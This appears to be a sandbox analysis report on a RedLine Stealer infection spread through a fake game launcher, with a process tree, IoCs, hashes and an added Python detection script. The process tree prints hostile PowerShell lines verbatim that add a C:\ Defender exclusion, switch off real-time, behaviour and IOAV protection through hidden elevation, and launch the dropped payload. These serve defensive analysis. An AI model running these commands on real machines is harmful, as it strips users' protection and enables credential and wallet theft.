Analysis
max time kernel: 96s
max time network: 204s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14/07/2024, 14:33
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://goo.su/xQHo
  Resource: win10v2004-20240709-en
General
Target: https://goo.su/xQHo
Malware Config
Extracted: redline
6951125327
https://t.me/+7Lir0e4Gw381MDhi*https://steamcommunity.com/profiles/76561199038841443
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoC)
resource:  behavioral1/memory/4652-469-0x0000000000400000-0x0000000000422000-memory.dmp
yara_rule: family_redline
The dump was taken from PID 4652, the RegAsm.exe child of 1720967645459.exe in the process tree below. The sandbox had earlier assigned the same PID to a short-lived Edge identity_helper.exe, so correlate this hit on image name and lineage, not on PID alone.

Command and Scripting Interpreter: PowerShell (1 TTP, 11 IoCs)
Run Powershell and hide display window.
pid   Process
4784  Powershell.exe
836   Powershell.exe
3468  Powershell.exe
4360  Powershell.exe
2456  Powershell.exe
460   powershell.exe
4360  Powershell.exe
4240  powershell.exe
4816  powershell.exe
4052  powershell.exe
3032  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
pid   Process
1636  1720967645459.exe
The file name reads as a Unix timestamp in milliseconds (1720967645459 is 2024-07-14 14:34:05 UTC, one minute after submission), so it is almost certainly generated per run; pivot on the file hashes rather than on the name.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of SetThreadContext (1 IoC)
description                          pid   Process            procid_target
PID 1636 set thread context of 4652  1636  1720967645459.exe  133
The dropped executable set the thread context of the RegAsm.exe process (PID 4652) in which the RedLine payload was later found in memory, i.e. the classic hollowing pattern of a freshly created host process having its entry point redirected.

Enumerates system info in registry (2 TTPs, 3 IoCs)
description        ioc                                                                    Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName    msedge.exe
All three reads come from the browser, not from the payload.

Modifies registry class (1 IoC)
description  ioc                                                                                    Process
Key created  \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings  msedge.exe

Suspicious behavior: EnumeratesProcesses (51 IoCs; identical rows collapsed, count in last column)
pid   Process              count
116   msedge.exe           2
4408  msedge.exe           2
2816  identity_helper.exe  2
4312  msedge.exe           2
4360  Powershell.exe       3
4784  Powershell.exe       3
2456  Powershell.exe       3
836   Powershell.exe       3
3032  powershell.exe       3
4052  powershell.exe       3
4816  powershell.exe       3
4240  powershell.exe       3
3468  Powershell.exe       2
460   powershell.exe       2
4652  RegAsm.exe           15

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (3 IoCs)
pid   Process     count
4408  msedge.exe  3

Suspicious use of AdjustPrivilegeToken (11 IoCs)
description              pid   Process
Token: SeDebugPrivilege  4784  Powershell.exe
Token: SeDebugPrivilege  2456  Powershell.exe
Token: SeDebugPrivilege  4360  Powershell.exe
Token: SeDebugPrivilege  836   Powershell.exe
Token: SeDebugPrivilege  3032  powershell.exe
Token: SeDebugPrivilege  4052  powershell.exe
Token: SeDebugPrivilege  4240  powershell.exe
Token: SeDebugPrivilege  4816  powershell.exe
Token: SeDebugPrivilege  3468  Powershell.exe
Token: SeDebugPrivilege  460   powershell.exe
Token: SeDebugPrivilege  4652  RegAsm.exe

Suspicious use of FindShellTrayWindow (47 IoCs)
pid   Process     count
4408  msedge.exe  47

Suspicious use of SendNotifyMessage (24 IoCs)
pid   Process     count
4408  msedge.exe  24

Suspicious use of SetWindowsHookEx (1 IoC)
pid   Process
4348  javaw.exe

Suspicious use of WriteProcessMemory (64 IoCs; identical rows collapsed)
description                             pid   Process     procid_target
PID 4408 wrote to memory of 3684        4408  msedge.exe  84
PID 4408 wrote to memory of 2168        4408  msedge.exe  87
PID 4408 wrote to memory of 116         4408  msedge.exe  88
PID 4408 wrote to memory of 1828        4408  msedge.exe  89
All four targets are Edge's own children (crashpad handler, GPU process, network service and storage service in the process tree below), which is consistent with normal Chromium child-process startup; none of the 64 writes involve the payload chain.
Processes
Indentation shows parent/child depth; "image" is the executable on disk and "cmd" the command line as logged. For the PowerShell children the two differ: the parents run from SysWOW64, so their request for System32\powershell.exe was redirected to the 32-bit copy by WoW64 file-system redirection.

[1] PID 4408  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

  [2] PID 3684  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf4718

  [2] PID 2168  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

  [2] PID 116  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

  [2] PID 1828  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8

  [2] PID 4088  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

  [2] PID 4772  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

  [2] PID 4652  image: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8

  [2] PID 2816  image: C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] PID 4736  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5528 /prefetch:8

  [2] PID 1160  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

  [2] PID 4312  image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

[1] PID 2216  image: C:\Windows\System32\CompPkgSrv.exe
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

[1] PID 4316  image: C:\Windows\System32\CompPkgSrv.exe
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

[1] PID 3464  image: C:\Windows\System32\rundll32.exe
    cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[1] PID 2316  image: C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe
    cmd: "C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"

  [2] PID 4348  image: C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe
      cmd: "C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
      - Suspicious use of SetWindowsHookEx

    [3] PID 4360  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        cmd: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] PID 4240  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 2456  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        cmd: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] PID 3032  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 4784  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        cmd: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] PID 4816  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 836  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        cmd: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] PID 4052  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 3468  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        cmd: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe"'}"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] PID 460  image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        [5] PID 1636  image: C:\Users\Admin\AppData\Local\Temp\1720967645459.exe
            cmd: "C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext

          [6] PID 4500  image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

          [6] PID 4652  image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
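The tree above is a complete, reproducible chain: a Java launcher spawns PowerShell, which asks UAC to elevate a hidden PowerShell child that adds a C:\ Defender exclusion and switches off real-time, behaviour and IOAV protection, then a dropped executable from %TEMP% starts an argument-less RegAsm.exe and sets its thread context. The Python below is an added example (not tria.ge output and not part of the original report) of the detection logic a SOC would run over process-creation telemetry for exactly this chain. The events it analyses are constructed here in a reduced Sysmon Event ID 1 shape, reusing the report's PIDs, paths and command lines; the process GUID fields, the two hollow-host names beyond RegAsm.exe and the trusted-parent directory allowlist are this example's assumptions.

```python
"""Detection logic for the javaw.exe -> PowerShell -> Defender tampering -> RegAsm.exe chain.
All events here are CONSTRUCTED for this example in a reduced Sysmon Event ID 1 shape
(process GUID, parent GUID, PID, image, command line); PIDs, paths and command lines are
copied from the report, but the event list is not tria.ge output. Lineage is keyed on
GUIDs, not PIDs, because the sandbox gave PID 4652 first to identity_helper.exe and
then to RegAsm.exe."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    guid: str     # unique per process instance (Sysmon ProcessGuid)
    pguid: str    # parent's guid (Sysmon ParentProcessGuid)
    pid: int
    image: str    # executable on disk
    cmdline: str  # command line as logged


# Defender tampering as in the report: cmdlet plus the switch it flips. Matched on the
# whole command line, so the launcher's quoted -ArgumentList fires as well as the child.
DEFENDER_TAMPER = re.compile(
    r"(?i)\b(Set-MpPreference|Add-MpPreference)\b.*?-(DisableRealtimeMonitoring|"
    r"DisableBehaviorMonitoring|DisableIOAVProtection|ExclusionPath)\b")
# A script asking UAC to elevate a hidden PowerShell window.
HIDDEN_ELEVATION = re.compile(r"(?i)Start-Process\b.*-WindowStyle\s+hidden\b.*-Verb\s+RunAs\b")
# .NET utilities used as injection hosts; RegAsm.exe is in the report, the other two are
# this example's assumption.
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}
TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(ev: ProcEvent) -> bool:
    """True when the command line is only the image path, quoted or bare."""
    return ev.cmdline.strip().strip('"').lower() == ev.image.lower()


def lineage(ev: ProcEvent, by_guid: dict) -> list:
    """Image basenames from this process up to the oldest ancestor we have an event for."""
    chain, cur, seen = [], ev, set()
    while cur is not None and cur.guid not in seen:
        seen.add(cur.guid)
        chain.append(basename(cur.image))
        cur = by_guid.get(cur.pguid)
    return chain


def analyze(events):
    """Return (pid, finding, detail) tuples for every event that matches a rule."""
    by_guid = {e.guid: e for e in events}
    findings = []
    for e in events:
        m = DEFENDER_TAMPER.search(e.cmdline)
        if m:
            findings.append((e.pid, "defender_tamper", m.group(2)))
        if HIDDEN_ELEVATION.search(e.cmdline):
            findings.append((e.pid, "hidden_elevation", "Start-Process -WindowStyle hidden -Verb RunAs"))
        parent = by_guid.get(e.pguid)  # None when the parent's event was not collected
        if (basename(e.image) in HOLLOW_HOSTS and has_no_arguments(e) and parent is not None
                and not parent.image.lower().startswith(TRUSTED_PARENT_DIRS)):
            findings.append((e.pid, "hollow_host", f"{basename(parent.image)} -> {basename(e.image)} (no args)"))
    return findings


# ---- constructed sample events, modelled on the process tree in the report ------------
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"
PS_CMD = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -Command '
DROP = r"C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
THUNDER = r"C:\Users\Admin\Downloads\Thunder Launcher v4.2"
EDGE_IDH = r"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"


def launcher(inner: str) -> str:
    """The outer PowerShell line from the report: hidden, elevated child running `inner`."""
    return ("Powershell.exe -Command \"& {Start-Process Powershell.exe -WindowStyle hidden "
            "-ArgumentList '-Command " + inner + "' -Verb RunAs}\"")


EVENTS = [
    ProcEvent("g-setup", "g-explorer", 2316, THUNDER + r"\Thunder Setup.exe", f'"{THUNDER}\\Thunder Setup.exe"'),
    ProcEvent("g-javaw", "g-setup", 4348, THUNDER + r"\jre\bin\javaw.exe",
              "javaw.exe -Dfile.encoding=UTF-8 -classpath lib org.develnext.jphp.ext.javafx.FXLauncher"),
    ProcEvent("g-ps1", "g-javaw", 4360, PS32, launcher("Add-MpPreference -Force -ExclusionPath C:\\")),
    ProcEvent("g-ps2", "g-ps1", 4240, PS32, PS_CMD + "Add-MpPreference -Force -ExclusionPath C:\\"),
    ProcEvent("g-ps3", "g-javaw", 836, PS32, launcher("Set-MpPreference -Force -DisableRealtimeMonitoring ")),
    ProcEvent("g-ps4", "g-ps3", 4052, PS32, PS_CMD + "Set-MpPreference -Force -DisableRealtimeMonitoring"),
    ProcEvent("g-ps5", "g-javaw", 460, PS32, PS_CMD + "Start-Process " + DROP),
    ProcEvent("g-drop", "g-ps5", 1636, DROP, f'"{DROP}"'),
    ProcEvent("g-regasm", "g-drop", 4652, REGASM, f'"{REGASM}"'),
    # Edge's own helper, the earlier owner of PID 4652 in the sandbox; must not match.
    ProcEvent("g-idh", "g-edge", 4652, EDGE_IDH, f'"{EDGE_IDH}" --type=utility'),
]

if __name__ == "__main__":
    for pid, kind, detail in analyze(EVENTS):
        print(f"{pid:>5}  {kind:<16} {detail}")
    by_guid = {e.guid: e for e in EVENTS}
    print("RegAsm lineage:", " <- ".join(lineage(by_guid["g-regasm"], by_guid)))
```

Run stand-alone it reports four Defender-tampering hits (the two launcher lines and the two elevated children), two hidden-elevation hits, one hollow-host hit for 1720967645459.exe -> regasm.exe, and the lineage regasm.exe <- 1720967645459.exe <- powershell.exe <- javaw.exe <- thunder setup.exe. Keying the parent lookup on process GUIDs is what keeps the earlier identity_helper.exe instance of PID 4652 from being confused with the RegAsm.exe host; a PID-keyed lookup would have silently mis-parented one of them.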
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: def65711d78669d7f8e69313be4acf2e
SHA1: 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256: aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512: 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Filesize: 152B
MD5: 8dc45b70cbe29a357e2c376a0c2b751b
SHA1: 25d623cea817f86b8427db53b82340410c1489b2
SHA256: 511cfb6bedbad2530b5cc5538b6ec2184fc4f85947ba4c8166d0bb9f5fe2703a
SHA512: 3ce0f52675feb16d6e62aae1c50767da178b93bdae28bacf6df3a2f72b8cc75b09c5092d9065e0872e5d09fd9ffe0c6931d6ae1943ddb1927b85d60659ef866e

Filesize: 152B
MD5: 1790c766c15938258a4f9b984cf68312
SHA1: 15c9827d278d28b23a8ea0389d42fa87e404359f
SHA256: 2e3978bb58c701f3c6b05de9349b7334a194591bec7bcf73f53527dc0991dc63
SHA512: 2682d9c60c9d67608cf140b6ca4958d890bcbc3c8a8e95fcc639d2a11bb0ec348ca55ae99a5840e1f50e5c5bcf3e27c97fc877582d869d98cc4ea3448315aafb

Filesize: 20KB
MD5: 5d3da8e9ab09ced1e70bbdb7f08d6d7a
SHA1: 6c775119468cf2708e56763950eafb58dae0a3f4
SHA256: 3a3dfe5f88d485cd08342a9aab67f9332afb309830ec74e86d13f10e985b87dc
SHA512: 1caca15c1653fe34e83e69ae730d8d84ea57baa042fb203166dc2167130e0420862faae41942bf9a0fb1a09dbefacd2a519661cc19c4e6fe88a9d8d601fc70b6

Filesize: 250B
MD5: f59173bd6bae4225216d91afe48b6017
SHA1: 9231eee8b25e96dcc0d58267cab3cc12130b82d9
SHA256: 00f46a4416df2f1d9af4fdf0fe9765ae0fa62fa34c590243b002da927d1ba9dc
SHA512: c17a4d40f409dc874fd77b0e9fff36602fb7cc640868ee877a12819e01169fac3a15fdf21a9d06a128c2352046c6d9545b51544b7997c2123a9d2c8bac88cc7b

Filesize: 6KB
MD5: 766815394ec267c2326059e3dbc23cd5
SHA1: f1f0fe419b29305a631c7591d0f376bf7c1cee80
SHA256: a6f370ab89678b2f7a172ae05007c8cf9fc3491f6fab1890bb3e0d7491db08d7
SHA512: cf764847de9d9696ac99439f71890431dee815821304117a78b8549d71e69effbfd822aa2767087eae335201e529c52ebac99d1fcc04947a46527b9a5b6b11bf

Filesize: 6KB
MD5: 2b4cbab8701d4200290de14bbe77e77e
SHA1: 561dcd7361045ed84248bb3ce031934ece40ed09
SHA256: d5cefbef2dfcfbbb7a2feb72351bdbd2a6f12ecc90e349da745089202c9ae8f1
SHA512: f66d1bb75f737fe47608b48f4e82c1c73961d70e9ce9cf7338d5ba653109a82863c135ac5979c19818e415989571193726ca31e4cfabae60cd0e23321a9334c4

Filesize: 6KB
MD5: 06e4538e1224a04a8a3763fd371bc44a
SHA1: 89444b13d31eda3780050e1aea12c902a5e723d2
SHA256: 36dc28b1f8b3de65b761150c373fbe441868b97d81e7b55c263735e1b6d20126
SHA512: e35a762d413aec5b6de7e6c658dd41daa28c2513bcd6a360306b0d6512c7dffa083ea4bd37b215d4fc78287eb33a33e953af029263f75874d40019eecc50513d

Filesize: 16B
MD5: 6752a1d65b201c13b62ea44016eb221f
SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize: 11KB
MD5: 5b77ea6614486fa9082661f1f7d37c27
SHA1: 6e51bf491e35a6659694e62ca8dd27cdc30c8d2a
SHA256: da899b1ce0fc127cdacfe489d2dc211eb94cefa71cf87ed849697fa43194acdb
SHA512: c672ca111f9c50e7a15ca6153c46aab6f07e701dda225c4490e637e74322a89e53b49d267a71a13aaf5e309b21dc9e0328e7b1aac1565fe6085a5984b8768f9c

Filesize: 11KB
MD5: 8f34b4bb777c1a0986c47a9a997f9c90
SHA1: f35b2fa6873ec2ff50be5bebb949acf2064602f7
SHA256: ab9772ed963566e5f085686165a6e5f4901d2de6c5c3024571c77df51bb9737e
SHA512: 327f683487c1a8672b311979fa05cec0d9b690ad965dde3d1e550e8073763b6c2ce9997867154b9492f5a384178594be200a0d9d301708c71867ee480b61e5b2

Filesize: 15KB
MD5: ab9e666fbf81d1bade718a9d090b3cc8
SHA1: 336d4418791cf3a3a43747b2cbce64d27e6f9eb2
SHA256: ab9b8fb9bda51953b5639dcb82b2ab5169277f9f30e801c3959d7db6337b19ea
SHA512: ad77405dd1dd5a5100df00d4f92aa11a075b32be8e10fee633fcb8338f21dc11edeb4b7a1274dd48d8f2e468d816486aad033f8270fe9d1aacce4048bd2c0b98

Filesize: 15KB
MD5: 2436b635cfbbcb083b5b822bbbd1766f
SHA1: 3c685c7d704905eb2ebe8868d1c4fbf77a260df5
SHA256: 4b1be1a64fd793be2dcbf17aadbf17efe219564e988c85c8113d58028cdd0c54
SHA512: 99cc64e67999f6c1e65cb6e9062a30bd7fa133a11230e28aaa4a01b7f05ea7e48ffc3c727c7eabd55d53be505d8a97c29181839b8977fa81a41cb9eb7e88b21f

Filesize: 18KB
MD5: c71a8dc614d33487d936e8dc24c16c14
SHA1: 08c231d3f620af564102c38d588f1b9cf88c1b22
SHA256: de2bdf4372ec3d859d2d34d8bf18566318c71e828bf765253e0442e2544645c6
SHA512: 9e49ce3152ed1a992b8b0c3e47cf083499cc73ad7a5310455d1eb7abcdba8fb4910cf926633aabde8ef7780d80812298d72537b575c916ca7af6cc6737f7d7f3

Filesize: 64B
MD5: 03d69955495ed2d4ed4c66035227ffb5
SHA1: 89bc196457ca1307fa4a6f6d7aaf0bc96b017063
SHA256: e207712d8b59f3f25846a7f0df052cbf731ca9a8f203e0ab621b26cc64ce3c3e
SHA512: de04d9fcfd8e053884a786d73237bc77d8d545f8f6b10a4672bf774a3d378b6626c419013e5c4b7be657466dd5695b22f902a4007b341e2d58415fde8e9bf06a

Filesize: 18KB
MD5: b193dba84e0315043c23544303b6ab6b
SHA1: 0ffc2d7f2cde07d85d92f513efc1736eb4cccf15
